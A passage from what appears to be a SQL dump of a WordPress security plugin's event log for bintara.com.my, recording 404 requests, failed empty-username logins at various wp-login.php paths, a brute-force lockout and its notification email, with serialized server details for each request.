Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"55726\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYucfWCmXVNwdgG8r8o44AAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569430653.2739\";s:12:\"REQUEST_TIME\";s:10:\"1569430653\";}}','notice','2019-09-25 16:57:35','2019-09-25 16:57:33',31212936,33025328,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27011,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=18\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"89.231.65.6\";s:11:\"REMOTE_PORT\";s:5:\"60748\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuq@rjw0hTms86NOnwX7QAAAY4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569434362.417\";s:12:\"REQUEST_TIME\";s:10:\"1569434362\";}}','notice','2019-09-25 17:59:25','2019-09-25 17:59:22',30821296,32634376,'https://bintara.com.my/?page_id=18',1,0,'89.231.65.6'),(27012,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=b4fbb208507096258909345458722b93\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYuvenIO9r9oxFSVqE95FQAAAMA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"110.4.45.46\";s:11:\"REMOTE_PORT\";s:5:\"49310\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuvenIO9r9oxFSVqE95FQAAAMA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569435514.5037\";s:12:\"REQUEST_TIME\";s:10:\"1569435514\";}}','notice','2019-09-25 18:18:36','2019-09-25 18:18:34',31183720,32718416,'https://bintara.com.my/blog/wp-login.php',1,0,'110.4.45.46'),(27013,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=796064c18b23de44b11ea7b0090d12be\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYuvqsIxHKnBK@s1Flc11wAAAVM\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"110.4.45.32\";s:11:\"REMOTE_PORT\";s:5:\"48252\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuvqsIxHKnBK@s1Flc11wAAAVM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569435562.5754\";s:12:\"REQUEST_TIME\";s:10:\"1569435562\";}}','notice','2019-09-25 18:19:24','2019-09-25 18:19:22',31178624,32708088,'https://bintara.com.my/test/wp-login.php',1,0,'110.4.45.32'),(27014,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"54578\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYuyA1Red5u6rkjAaVY1swAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569436163.7096\";s:12:\"REQUEST_TIME\";s:10:\"1569436163\";}}','notice','2019-09-25 18:29:26','2019-09-25 18:29:24',31216088,33022920,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27015,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/?p=158\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:160:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:24:\"HTTP_AMP_CACHE_TRANSFORM\";s:17:\"google;v=\\\"1..2\\\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:5:\"p=158\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.79.78\";s:11:\"REMOTE_PORT\";s:5:\"39401\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYu7y1Red5u6rkjAaVY27wAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569438667.7378\";s:12:\"REQUEST_TIME\";s:10:\"1569438667\";}}','notice','2019-09-25 19:11:10','2019-09-25 19:11:08',30029952,30377320,'https://bintara.com.my/?p=158',1,0,'66.249.79.78'),(27016,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=dff402de2f24010024bb735d4b49d482\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYu9I8IxHKnBK@s1Flc6yQAAAVY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.6.245.199\";s:11:\"REMOTE_PORT\";s:5:\"45228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYu9I8IxHKnBK@s1Flc6yQAAAVY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569439012.0683\";s:12:\"REQUEST_TIME\";s:10:\"1569439012\";}}','notice','2019-09-25 19:16:54','2019-09-25 19:16:52',31181024,32714424,'https://bintara.com.my/test/wp-login.php',1,0,'103.6.245.199'),(27017,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=243c2d41725ad37f2ac80eb8e87aafec\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYu@TLjw0hTms86NOnwj2gAAAZc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.6.245.199\";s:11:\"REMOTE_PORT\";s:5:\"36912\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYu@TLjw0hTms86NOnwj2gAAAZc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569439308.3079\";s:12:\"REQUEST_TIME\";s:10:\"1569439308\";}}','notice','2019-09-25 19:21:50','2019-09-25 19:21:48',31184736,32712712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.245.199'),(27018,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 03:21:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 19:21:48\";s:14:\"lockout_expire\";s:19:\"2019-09-30 07:21:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-29 23:21:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 19:21:50','2019-09-25 19:21:48',31266088,32712712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.245.199'),(27019,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 19:21:50','2019-09-25 19:21:48',31888800,32712712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.245.199'),(27020,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=9af8f4ffa75ab9c9ae7cfd457906fef6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 